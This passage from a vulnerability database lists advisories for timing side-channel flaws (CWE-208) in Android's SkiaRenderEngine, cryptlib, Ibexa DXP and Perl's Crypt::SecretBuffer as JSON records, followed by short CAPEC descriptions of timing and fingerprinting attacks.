"summary": "Django has Observable Timing Discrepancy"
}
GHSA-2P8V-R473-9VXR
Vulnerability from github – Published: 2026-03-02 21:31 – Updated: 2026-03-06 06:30In drawLayersInternal of SkiaRenderEngine.cpp, there is a possible way to access the GPU cache due to side channel information disclosure. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2025-48630"
],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-02T19:16:27Z",
"severity": "HIGH"
},
"details": "In drawLayersInternal of SkiaRenderEngine.cpp, there is a possible way to access the GPU cache due to side channel information disclosure. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
"id": "GHSA-2p8v-r473-9vxr",
"modified": "2026-03-06T06:30:29Z",
"published": "2026-03-02T21:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48630"
},
{
"type": "WEB",
"url": "https://source.android.com/docs/security/bulletin/2026/2026-03-01"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2026-03-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2WFF-JJ2F-98C4
Vulnerability from github – Published: 2024-02-05 21:30 – Updated: 2024-02-05 21:30A security vulnerability has been identified in the cryptlib cryptographic library when cryptlib is compiled with the support for RSA key exchange ciphersuites in TLS (by setting the USE_RSA_SUITES define), it will be vulnerable to the timing variant of the Bleichenbacher attack. An attacker that is able to perform a large number of connections to the server will be able to decrypt RSA ciphertexts or forge signatures using server's certificate.
{
"affected": [],
"aliases": [
"CVE-2024-0202"
],
"database_specific": {
"cwe_ids": [
"CWE-203",
"CWE-208"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-05T21:15:11Z",
"severity": "MODERATE"
},
"details": "A security vulnerability has been identified in the cryptlib cryptographic library when cryptlib is compiled with the support for RSA key exchange ciphersuites in TLS (by setting the USE_RSA_SUITES define), it will be vulnerable to the timing variant of the Bleichenbacher attack. An attacker that is able to perform a large number of connections to the server will be able to decrypt RSA ciphertexts or forge signatures using server\u0027s certificate.",
"id": "GHSA-2wff-jj2f-98c4",
"modified": "2024-02-05T21:30:31Z",
"published": "2024-02-05T21:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0202"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256518"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2X4V-G8CX-JXRQ
Vulnerability from github – Published: 2022-06-02 21:02 – Updated: 2022-06-02 21:02Ibexa DXP is using random execution time to hinder timing attacks against user accounts, a method of discovering whether a given account exists in a system without knowing its password, thus affecting privacy. This implementation was found to not be good enough in some situations. The fix replaces this with constant time functionality, configured in the new security.yml parameter 'ibexa.security.authentication.constant_auth_time'. It will log a warning if the constant time is exceeded. If this happens the setting should be increased.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "ibexa/core"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "ibexa/core"
},
"ranges": [
{
"events": [
{
"introduced": "4.1.0"
},
{
"fixed": "4.1.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-02T21:02:24Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "Ibexa DXP is using random execution time to hinder timing attacks against user accounts, a method of discovering whether a given account exists in a system without knowing its password, thus affecting privacy. This implementation was found to not be good enough in some situations. The fix replaces this with constant time functionality, configured in the new security.yml parameter \u0027ibexa.security.authentication.constant_auth_time\u0027. It will log a warning if the constant time is exceeded. If this happens the setting should be increased.",
"id": "GHSA-2x4v-g8cx-jxrq",
"modified": "2022-06-02T21:02:24Z",
"published": "2022-06-02T21:02:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ibexa/core/security/advisories/GHSA-2x4v-g8cx-jxrq"
},
{
"type": "WEB",
"url": "https://developers.ibexa.co/security-advisories/ibexa-sa-2022-006-vulnerabilities-in-page-builder-login-and-commerce"
},
{
"type": "PACKAGE",
"url": "https://github.com/ibexa/core"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Login timing attack in ibexa/core"
}
GHSA-2XM3-5JP9-423W
Vulnerability from github – Published: 2026-04-14 00:31 – Updated: 2026-04-15 21:30Crypt::SecretBuffer versions before 0.019 for Perl is suseceptible to timing attacks.
For example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepencies in timing could be used to guess the secret password.
{
"affected": [],
"aliases": [
"CVE-2026-5086"
],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-13T23:16:27Z",
"severity": "HIGH"
},
"details": "Crypt::SecretBuffer versions before 0.019 for Perl is suseceptible to timing attacks.\n\nFor example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepencies in timing could be used to guess the secret password.",
"id": "GHSA-2xm3-5jp9-423w",
"modified": "2026-04-15T21:30:16Z",
"published": "2026-04-14T00:31:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5086"
},
{
"type": "WEB",
"url": "https://metacpan.org/release/NERDVANA/Crypt-SecretBuffer-0.019/source/Changes"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/04/13/12"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-462: Cross-Domain Search Timing
An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.
CAPEC-541: Application Fingerprinting
An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.
CAPEC-580: System Footprinting
An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.